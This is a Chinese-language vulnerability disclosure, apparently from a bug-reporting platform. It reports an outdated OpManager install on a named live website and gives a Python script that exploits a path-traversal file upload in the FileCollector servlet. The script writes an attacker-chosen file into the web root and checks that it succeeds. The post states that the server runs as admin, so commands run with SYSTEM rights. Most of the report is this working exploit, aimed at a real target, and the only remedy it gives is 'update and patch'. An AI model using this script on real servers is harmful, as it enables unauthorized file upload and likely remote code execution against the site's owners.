opmanager版本过低,附自己用python写的验证程序

存在问题的站点:https://ns1.dchnu.com

使用了低版本的opmanager,存在上传漏洞,该系统是以admin权限跑的,可直接system权限执行命令。

自己写了一个验证程序,可以简单测测,不用搞metaspolit那么麻烦了。

#-*-coding:utf-8-*- import sys, httplib,webbrowser from optparse import OptionParser parser = OptionParser() parser.add_option("-t","--target",dest="host",help="press the target host,not include https://",metavar="HOST") parser.add_option("-p","--port",dest="port",default='80',help="press the port,default 80") (options,args) = parser.parse_args() print options.host,options.port if options.host==None: print 'ERROR:please press the correct target' exit() host = options.host+':'+options.port params = "test by w00yun" #上传内容 filename = 'test1.txt' #上传文件名 url = "/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../&FILENAME="+filename url1 = 'https://'+host+'/'+filename headers = { "Content-Type": "application/xml", "Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", "Host": host, "Connection": "Keep-Alive", "Cache-Control": "no-cache" } con2 = httplib.HTTPConnection(host) con2.request("POST", url, params, headers) r2 = con2.getresponse() if r2.status == 500: print "Success", "\n" webbrowser.open_new_tab(url1) else: print "Failed", "\n" con2.close()

可以-h看下使用方法

QQ截图20150227004354.jpg

QQ截图20150227004430.jpg


QQ截图20150227004439.jpg

解决方案:

更新版本打补丁